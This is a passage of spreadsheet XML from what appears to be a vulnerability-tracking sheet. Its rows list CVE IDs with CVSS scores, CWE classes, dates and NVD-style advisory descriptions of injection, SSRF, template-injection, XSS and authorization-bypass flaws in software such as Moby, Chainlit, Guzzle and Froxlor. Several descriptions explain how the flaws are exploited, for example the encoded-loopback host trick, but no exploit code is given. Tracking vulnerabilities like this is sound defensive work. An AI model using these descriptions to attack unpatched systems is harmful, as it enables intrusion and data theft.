      </c>
      <c r="D3011" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3011" s="5" t="inlineStr"/>
      <c r="F3011" s="5" t="n">
        <v>0.025</v>
      </c>
      <c r="G3011" s="5" t="inlineStr"/>
      <c r="H3011" s="5" t="inlineStr"/>
      <c r="I3011" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J3011" s="5" t="inlineStr"/>
      <c r="K3011" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L3011" s="5" t="inlineStr">
        <is>
          <t>TR1200 v2.4.15 and TR3000 v2.4.21 were discovered to contain a command injection vulnerability in the system.setclock interface. This vulnerability allows attackers to execute arbitrary commands as root via a crafted input.</t>
        </is>
      </c>
      <c r="M3011" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38710</t>
        </is>
      </c>
    </row>
    <row r="3012">
      <c r="A3012" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3012" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41567</t>
        </is>
      </c>
      <c r="C3012" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3012" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3012" s="5" t="inlineStr"/>
      <c r="F3012" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3012" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H3012" s="5" t="inlineStr"/>
      <c r="I3012" s="5" t="inlineStr">
        <is>
          <t>2026-06-05</t>
        </is>
      </c>
      <c r="J3012" s="5" t="inlineStr"/>
      <c r="K3012" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="L3012" s="5" t="inlineStr">
        <is>
          <t>Moby is an open source container framework. In versions prior to 29.5.1 and in moby/moby v2 prior to v2.0.0-beta.14, when a compressed archive is uploaded to a container via `PUT /containers/{id}/archive` or piped through `docker cp -`, the daemon resolves decompression binaries (such as `xz` or `unpigz`) from the container's filesystem rather than the host's due to incorrect ordering of operations. A malicious container image containing a trojanized decompression binary can achieve arbitrary code execution with full daemon privileges, including host root UID and unrestricted capabilities, when a user uploads a compressed (xz or gzip) archive into that container. This issue is fixed in Docker Engine 29.5.1 and moby/moby v2.0.0-beta.14. Workarounds include only running containers from trusted images, using authorization plugins to restrict access to the `PUT /containers/{id}/archive` endpoint, and avoiding piping compressed archives into containers created from untrusted images</t>
        </is>
      </c>
      <c r="M3012" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41567</t>
        </is>
      </c>
    </row>
    <row r="3013">
      <c r="A3013" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3013" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45019</t>
        </is>
      </c>
      <c r="C3013" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3013" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3013" s="5" t="inlineStr"/>
      <c r="F3013" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3013" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H3013" s="5" t="inlineStr"/>
      <c r="I3013" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3013" s="5" t="inlineStr"/>
      <c r="K3013" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3013" s="5" t="inlineStr">
        <is>
          <t>Chainlit is a Python framework for building production-ready conversational AI applications. From 2.4.0rc0 until 2.12.0, Chainlit deployments with features.mcp.enabled set to true in .chainlit/config.toml expose the POST /mcp endpoint without requiring authentication. For sse and streamable-http transports, ConnectSseMCPRequest and ConnectStreamableHttpMCPRequest in backend/chainlit/types.py accept a user-controlled url and optional headers dictionary without scheme validation, private-address filtering, or an allowlist. The connect_mcp handler in backend/chainlit/server.py passes these values to sse_client() or streamablehttp_client(), allowing the Chainlit server to make blind outbound requests to arbitrary internal or external services, including cloud metadata endpoints, with attacker-controlled Authorization and Cookie headers. The SSE URL sink has existed since 2.4.0rc0, while attacker-controlled header forwarding and streamable-http support were added in 2.6.4. The response is consumed internally and not returned, but the attacker can issue state-changing authenticated requests, discover internal services, scan ports, and probe metadata endpoints. This issue is fixed in version 2.12.0.</t>
        </is>
      </c>
      <c r="M3013" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45019</t>
        </is>
      </c>
    </row>
    <row r="3014">
      <c r="A3014" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3014" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53499</t>
        </is>
      </c>
      <c r="C3014" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3014" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3014" s="5" t="inlineStr"/>
      <c r="F3014" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3014" s="5" t="inlineStr"/>
      <c r="H3014" s="5" t="inlineStr"/>
      <c r="I3014" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J3014" s="5" t="inlineStr"/>
      <c r="K3014" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L3014" s="5" t="inlineStr">
        <is>
          <t>FORT Validator is a Resource Public Key Infrastructure (RPKI) relying-party validator that produces validated route-origin data. FORT Validator versions through 1.6.7 contain an origin-validation error in their RRDP processing: a delegated CA under the same Trust Anchor Locator (TAL) can reference a victim CA’s public RRDP notification and snapshot URLs, causing FORT’s URL-based download cache to report success after deleting the victim’s local snapshot. Following a routine victim publication, this can silently remove the victim’s VRPs and other signed objects from FORT’s output, potentially enabling route hijacking or loss of reachability. Version 1.6.8 contains a patch that rejects cross-origin RRDP snapshot and delta URLs; as a workaround, administrators can disable HTTP/RRDP with  --http.enabled=false  while keeping rsync enabled, although this can leave data unavailable or stale where rsync is not supported.</t>
        </is>
      </c>
      <c r="M3014" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53499</t>
        </is>
      </c>
    </row>
    <row r="3015">
      <c r="A3015" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3015" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54348</t>
        </is>
      </c>
      <c r="C3015" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3015" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3015" s="5" t="inlineStr"/>
      <c r="F3015" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3015" s="5" t="inlineStr"/>
      <c r="H3015" s="5" t="inlineStr"/>
      <c r="I3015" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J3015" s="5" t="inlineStr"/>
      <c r="K3015" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L3015" s="5" t="inlineStr">
        <is>
          <t>Froxlor is open source server administration software. Prior to 2.3.8, the Admins.add and Admins.update endpoints in lib/Froxlor/Api/Commands/Admins.php accept an attacker-controlled ipaddress array and store it as JSON in panel_admins.ip without enforcing numeric element types. When the poisoned account later calls IpsAndPorts.listing, lib/Froxlor/Api/Commands/IpsAndPorts.php decodes the array and concatenates its elements into a SQL IN clause without casting or parameterization; the same unsafe pattern is present in lib/Froxlor/Api/Commands/Domains.php. An authenticated administrator with change_serversettings permission can store a UNION-based payload and trigger it through the poisoned account to retrieve arbitrary database data, including administrator login names and bcrypt password hashes, with potential privilege escalation and broader database impact. This issue is fixed in version 2.3.8.</t>
        </is>
      </c>
      <c r="M3015" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54348</t>
        </is>
      </c>
    </row>
    <row r="3016">
      <c r="A3016" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3016" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54605</t>
        </is>
      </c>
      <c r="C3016" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3016" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3016" s="5" t="inlineStr"/>
      <c r="F3016" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3016" s="5" t="inlineStr"/>
      <c r="H3016" s="5" t="inlineStr"/>
      <c r="I3016" s="5" t="inlineStr">
        <is>
          <t>2026-07-28</t>
        </is>
      </c>
      <c r="J3016" s="5" t="inlineStr"/>
      <c r="K3016" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-346, CWE-918</t>
        </is>
      </c>
      <c r="L3016" s="5" t="inlineStr">
        <is>
          <t>OAuth is a Ruby wrapper for the OAuth 1.0 and 1.0a protocols, providing clients and servers. From 0.5.5 to 1.1.5, OAuth::Consumer#token_request parses the raw Location header of a 300 to 399 redirect returned by the OAuth server and follows the redirect recursively, which can mutate the consumer's configuration and expose signed OAuth request metadata, including the Authorization header, to a cross-origin host. This issue is fixed in version 1.1.6.</t>
        </is>
      </c>
      <c r="M3016" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54605</t>
        </is>
      </c>
    </row>
    <row r="3017">
      <c r="A3017" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3017" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54718</t>
        </is>
      </c>
      <c r="C3017" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3017" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3017" s="5" t="inlineStr"/>
      <c r="F3017" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3017" s="5" t="inlineStr"/>
      <c r="H3017" s="5" t="inlineStr"/>
      <c r="I3017" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J3017" s="5" t="inlineStr"/>
      <c r="K3017" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L3017" s="5" t="inlineStr">
        <is>
          <t>Silverstripe Advanced Workflow is a highly configurable step-based workflow module. Prior to 6.4.5, 7.1.3, and 7.2.1, an attacker with permission to author the advanced workflow email template can place a specially crafted server-side template payload in NotifyUsersWorkflowAction.EmailTemplate. When NotifyUsersWorkflowAction renders the field through the Silverstripe template engine SSTemplateParser, the payload can cause PHP evaluation and arbitrary code execution on the server; the regression coverage is in tests/php/WorkflowEngineTest.php. This issue is fixed in versions 6.4.5, 7.1.3, and 7.2.1.</t>
        </is>
      </c>
      <c r="M3017" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54718</t>
        </is>
      </c>
    </row>
    <row r="3018">
      <c r="A3018" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3018" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55192</t>
        </is>
      </c>
      <c r="C3018" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3018" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3018" s="5" t="inlineStr"/>
      <c r="F3018" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3018" s="5" t="inlineStr"/>
      <c r="H3018" s="5" t="inlineStr"/>
      <c r="I3018" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J3018" s="5" t="inlineStr"/>
      <c r="K3018" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3018" s="5" t="inlineStr">
        <is>
          <t>FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.27.0, FreeRDP H.264 decoder backends can return YUV planes sized from the bitstream without comparing the decoded width and height to the RDPGFX surface dimensions used to validate region rectangles. A malicious RDP server can provide an AVC420 or AVC444 bitstream whose decoded frame is smaller than the negotiated surface, causing yuv420_context_decode and the YUV-to-RGB conversion paths to read beyond the decoder-owned planes in libfreerdp/codec/h264.c and the selected H.264 backend. This can disclose client memory or crash the client. This issue is fixed in version 3.27.0.</t>
        </is>
      </c>
      <c r="M3018" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55192</t>
        </is>
      </c>
    </row>
    <row r="3019">
      <c r="A3019" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3019" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6431</t>
        </is>
      </c>
      <c r="C3019" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3019" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3019" s="5" t="inlineStr"/>
      <c r="F3019" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3019" s="5" t="inlineStr"/>
      <c r="H3019" s="5" t="inlineStr"/>
      <c r="I3019" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3019" s="5" t="inlineStr"/>
      <c r="K3019" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3019" s="5" t="inlineStr">
        <is>
          <t>The User Profile Builder – Beautiful User Registration Forms, User Profiles &amp; User Role Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Biographical Info' meta field parameter in all versions up to, and including, 3.15.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="M3019" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6431</t>
        </is>
      </c>
    </row>
    <row r="3020">
      <c r="A3020" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3020" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69246</t>
        </is>
      </c>
      <c r="C3020" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3020" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3020" s="5" t="inlineStr"/>
      <c r="F3020" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3020" s="5" t="inlineStr"/>
      <c r="H3020" s="5" t="inlineStr"/>
      <c r="I3020" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J3020" s="5" t="inlineStr"/>
      <c r="K3020" s="5" t="inlineStr">
        <is>
          <t>CWE-180, CWE-436, CWE-918, CWE-941</t>
        </is>
      </c>
      <c r="L3020" s="5" t="inlineStr">
        <is>
          <t>Guzzle is an extensible PHP HTTP client. Prior to 7.15.2 and 8.0.1, Guzzle gives a transport the request URI as text and supplies the Host header separately. The cURL handlers set CURLOPT_URL to the URI exactly as written and push that Host into CURLOPT_HTTPHEADER; StreamHandler does the same through fopen(). libcurl then parses the authority itself, percent-decoding it and, on an IDN-capable build, applying IDNA mapping, and uses the result to resolve, connect, name the TLS peer and address a proxy CONNECT, while the supplied Host suppresses the aligned one libcurl would have generated. For a URI host written as 127.0.0.%31, filter_var() rejects the host as an IP literal, yet libcurl decodes it to 127.0.0.1 and reaches loopback with no DNS lookup while the server receives Host: 127.0.0.%31. An attacker who influences a fetched URI can therefore reach a host the application's checks excluded and read whatever the host exposes of the response. The same divergence moves Guzzle's own decisions onto a spelling the transport does not use: no_proxy selects proxy routing from the literal host, and RedirectMiddleware decides from it whether to strip Authorization and Cookie. Exploitation requires the application to build a request URI from untrusted input and to make a host decision before handing it to Guzzle. This issue is fixed in versions 7.15.2 and 8.0.1.</t>
        </is>
      </c>
      <c r="M3020" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69246</t>
        </is>
      </c>
    </row>
    <row r="3021">
      <c r="A3021" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3021" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69252</t>
        </is>
      </c>
      <c r="C3021" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3021" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3021" s="5" t="inlineStr"/>
      <c r="F3021" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3021" s="5" t="inlineStr"/>
      <c r="H3021" s="5" t="inlineStr"/>
      <c r="I3021" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J3021" s="5" t="inlineStr"/>
      <c r="K3021" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3021" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, the /api/v1/files route was protected only by the feat:files feature gate and did not enforce checkPermission on GET or DELETE. A low-privileged authenticated API key with unrelated permissions could call GET /api/v1/files to list files under the organization storage root and DELETE /api/v1/files?path=... to delete files belonging to other workspaces in the same organization because getAllFiles and deleteFile used activeOrganizationId and a user-controlled path without restricting access by permissions or activeWorkspaceId. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M3021" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69252</t>
        </is>
      </c>
    </row>
    <row r="3022">
      <c r="A3022" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3022" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70608</t>
        </is>
      </c>
      <c r="C3022" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3022" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3022" s="5" t="inlineStr"/>
      <c r="F3022" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3022" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3022" s="5" t="inlineStr"/>
      <c r="I3022" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J3022" s="5" t="inlineStr"/>
      <c r="K3022" s="5" t="inlineStr">
        <is>
          <t>CWE-1021, CWE-693</t>
        </is>
      </c>
      <c r="L3022" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.10, 41.10.3, and 42.0.1, a sandboxed iframe without the allow-popups keyword could still open a new window or trigger setWindowOpenHandler with no user interaction because new-window navigations taking the OpenURL path did not apply the iframe sandbox popup restriction. Apps that embed untrusted content in sandboxed iframes and rely on the absence of allow-popups to prevent window creation are affected, while apps that deny window creation in setWindowOpenHandler or do not embed untrusted content in sandboxed iframes are not affected. This issue is fixed in 39.8.10, 41.10.3, and 42.0.1.</t>
        </is>
      </c>
      <c r="M3022" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70608</t>
        </is>
      </c>
    </row>
    <row r="3023">
      <c r="A3023" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3023" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71506</t>
        </is>
      </c>
      <c r="C3023" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3023" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3023" s="5" t="inlineStr"/>
      <c r="F3023" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3023" s="5" t="inlineStr"/>
      <c r="H3023" s="5" t="inlineStr"/>
      <c r="I3023" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J3023" s="5" t="inlineStr"/>
      <c r="K3023" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3023" s="5" t="inlineStr">
        <is>
          <t>Dolibarr before 24.0.0 contains an improper authorization vulnerability in the payments REST API delete endpoint that allows authenticated attackers with invoice-deletion rights to permanently delete any payment record by bypassing the intended payment-issuance rights check. Attackers can exploit this misconfigured permission check to zero paid amounts on invoices and remove entries from accounting exports, causing financial data integrity loss.</t>
        </is>
      </c>
      <c r="M3023" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71506</t>
        </is>
      </c>
    </row>
    <row r="3024">
      <c r="A3024" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3024" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72825</t>
        </is>
      </c>
      <c r="C3024" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3024" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3024" s="5" t="inlineStr"/>
      <c r="F3024" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3024" s="5" t="inlineStr"/>
      <c r="H3024" s="5" t="inlineStr"/>
      <c r="I3024" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
      <c r="J3024" s="5" t="inlineStr"/>
      <c r="K3024" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3024" s="5" t="inlineStr">
        <is>
          <t>The getgrav/grav-plugin-api plugin before 1.0.13 contains an API-key scope cap bypass in the POST /reports/twig-content/allowlist endpoint (ReportsController). The endpoint enforces requirePermission('api.config.write') followed by a bare isSuperAdmin() check instead of requireSuper(). Because isSuperAdmin() reads access.api.super directly and never consults api_key_scopes, a least-privilege API key scoped to api.config.write minted on a super account passes the gate, allowing an attacker to append attacker-chosen tokens to the security.twig_sandbox allowlist (persisted to user/config/security.yaml). Widening the allowlist turns any subsequent Twig-in-content render into an SSTI/RCE sink.</t>
        </is>
      </c>
      <c r="M3024" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72825</t>
        </is>
      </c>
    </row>
    <row r="3025">
      <c r="A3025" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3025" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73613</t>
        </is>
      </c>
      <c r="C3025" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3025" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3025" s="5" t="inlineStr"/>
      <c r="F3025" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3025" s="5" t="inlineStr"/>
      <c r="H3025" s="5" t="inlineStr"/>
      <c r="I3025" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3025" s="5" t="inlineStr"/>
      <c r="K3025" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L3025" s="5" t="inlineStr">
        <is>
          <t>filebrowser versions before 2.63.19 contain an out-of-scope file deletion vulnerability in the TUS upload cache eviction mechanism that allows authenticated users with only Create permission to delete arbitrary files outside their scope. Attackers can swap an ancestor directory with a symlink during the cache TTL window to redirect the raw os.Remove call to an out-of-scope target, bypassing ScopedFs scope guards and Perm.Delete checks.</t>
        </is>
      </c>
      <c r="M3025" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73613</t>
        </is>
      </c>
    </row>
    <row r="3026">
      <c r="A3026" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3026" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73624</t>
        </is>
      </c>
      <c r="C3026" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3026" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3026" s="5" t="inlineStr"/>
      <c r="F3026" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3026" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H3026" s="5" t="inlineStr"/>
      <c r="I3026" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3026" s="5" t="inlineStr"/>
      <c r="K3026" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L3026" s="5" t="inlineStr">
        <is>
          <t>GitPython versions before 3.1.54 contain an arbitrary file overwrite vulnerability in the Diffable.diff method that fails to validate git options passed through kwargs. Attackers can supply the --output argument via the other parameter or output kwarg to write patch content to attacker-chosen file paths at process privilege level.</t>
        </is>
      </c>
      <c r="M3026" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73624</t>
        </is>
      </c>
    </row>
    <row r="3027">
      <c r="A3027" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3027" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73769</t>
        </is>
      </c>
      <c r="C3027" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3027" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3027" s="5" t="inlineStr"/>
      <c r="F3027" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G3027" s="5" t="inlineStr"/>
      <c r="H3027" s="5" t="inlineStr"/>
      <c r="I3027" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3027" s="5" t="inlineStr"/>
      <c r="K3027" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3027" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of vulnerable CPPM systems could allow an authenticated remote attacker to achieve remote code execution. Successful exploitation could allow an attacker to execute arbitrary commands on the underlying operating system.</t>
        </is>
      </c>
      <c r="M3027" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73769</t>
        </is>
      </c>
    </row>
    <row r="3028">
      <c r="A3028" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3028" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73787</t>
        </is>
      </c>
      <c r="C3028" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3028" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3028" s="5" t="inlineStr"/>
      <c r="F3028" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G3028" s="5" t="inlineStr"/>
      <c r="H3028" s="5" t="inlineStr"/>
      <c r="I3028" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3028" s="5" t="inlineStr"/>
      <c r="K3028" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3028" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the CPPM web interface could allow an authenticated remote attacker to access directory information on a vulnerable system. Successful exploitation could allow an attacker to execute arbitrary commands on the underlying operating system.</t>
        </is>
      </c>
      <c r="M3028" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73787</t>
        </is>
      </c>
    </row>
    <row r="3029">
      <c r="A3029" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3029" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74925</t>
        </is>
      </c>
      <c r="C3029" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3029" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3029" s="5" t="inlineStr"/>
      <c r="F3029" s="5" t="inlineStr"/>
      <c r="G3029" s="5" t="inlineStr"/>
      <c r="H3029" s="5" t="inlineStr"/>
      <c r="I3029" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3029" s="5" t="inlineStr"/>
      <c r="K3029" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L3029" s="5" t="inlineStr">
        <is>
          <t>The MultiVendorX  WordPress plugin before 5.0.16 does not restrict who can update its role and capability settings, allowing users holding its vendor role to grant that role administrator-level capabilities and take over the site.</t>
        </is>
      </c>
      <c r="M3029" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74925</t>
        </is>
      </c>
    </row>
    <row r="3030">
      <c r="A3030" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3030" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74998</t>
        </is>
      </c>
      <c r="C3030" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3030" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3030" s="5" t="inlineStr"/>
      <c r="F3030" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3030" s="5" t="inlineStr"/>
      <c r="H3030" s="5" t="inlineStr">
        <is>
          <t>roundcube:webmail</t>
        </is>
      </c>
      <c r="I3030" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
